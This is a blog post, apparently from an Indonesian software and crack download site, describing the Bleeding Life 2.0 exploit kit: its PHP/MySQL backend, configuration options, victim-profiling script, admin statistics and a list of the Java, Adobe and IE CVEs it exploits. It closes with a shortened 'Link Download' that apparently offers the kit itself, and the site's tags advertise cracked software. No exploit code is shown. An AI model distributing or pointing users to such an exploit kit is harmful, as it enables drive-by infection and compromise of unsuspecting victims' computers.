[Exploit Kit] Bleeding Life (2.0)
13 November 2016
13 November 2016
The Bleeding Life exploit kit is a blackhat Web application consisting of several recent exploits. Since first mentioned in October 2010 there were: two full versions (v1 and v2), Mini-Java version, Java edition, Adobe edition and the latest – Bleeding Life RELOADED seen „in-the-wild“. As with other exploit kits, this one uses PHP and MySQL backend; it also utilizes AJAX technology to refresh statistics in real time, allowing the owner of this kit to be aware of situations in real time.
This kit can be modified by editing configuration files to control such things as: time between exploitation attempts, use of AJAX for overall statistics and refresh time, reuse of iframe (either each exploit is going to be created in its own iframe or use the same iframe), and name of the malicious payload file. The Admin panel does not sport the latest features seen in other exploit kits, providing only statistics such as: exploits, browsers, countries, operating systems, and referrers.
The author of this product claims „it is intended solely for the purposes of vulnerability and penetration testing“ but encrypts it with commercial PHP encryption and sells it on black market forums. The Bleeding Life exploit kit uses exploits which can bypass ASLR and DEP, which means this product could be used successfully against Windows 7 and Windows Vista operating systems.
The list of exploits used does not vary much from other known kits, though one of the exploits is actually a social engineering technique (similar tactics were used in the Unique exploit kit) to lure victims to download and run a malicious Java applet. The Bleeding Life exploit kit uses JavaScript – PluginDetect.js to collect information about victims and then servers exploit them accordingly.
Quote
Below is a running list of vulnerabilities that have been used with the Bleeding Life exploit kit:
CVE-2010-3552 Unspecified vulnerability in New Java Plugin component in Oracle Java SE
CVE-2010-2884 Adobe authplay.dll ActionScript AVM2 memory corruption Vulnerability
CVE-2010-1297 Adobe authplay.dll ActionScript AVM2 „newfunction“ Vulnerability
CVE-2010-0842 Vulnerability in the Sound component in Oracle Java SE
CVE-2010-0188 Adobe Reader LibTiff Vulnerability
CVE-2008-2992 Adobe Reader util.printf Vulnerability
CVE-2006-0003 IE MDAC
JavaSignedApplet – Java Signed Applet to download and execute a payload
Link Download : http://adf.ly/1feQGG
Terkait
by Newcyber.NET
Custom Search
1$ | Donasi Kopi Untuk Sang Creator
Recent News
Gratis Download WinRAR Terbaru 5.91c Full Version 2021
17 April 2021
Tag
adobe
Android
Android Tutorial
Anti Virus
Aplikasi
Article
Author
Belajar Website
Canon
Crack
Css
Download
Download Driver
Download Game PC
Driver Printer
Free
Full Crack
Full Version
Games
HTML
Internet
Jaringan
linux
Malware
Mikrotik
Networking
Offline Installer
OS
PC Game
PHP
Post
Premium
Printer
Pro
review
Seo
Software
Tips
Tool
Tutorial
Web developer
Website
Windows
Wordpress
Xiaomi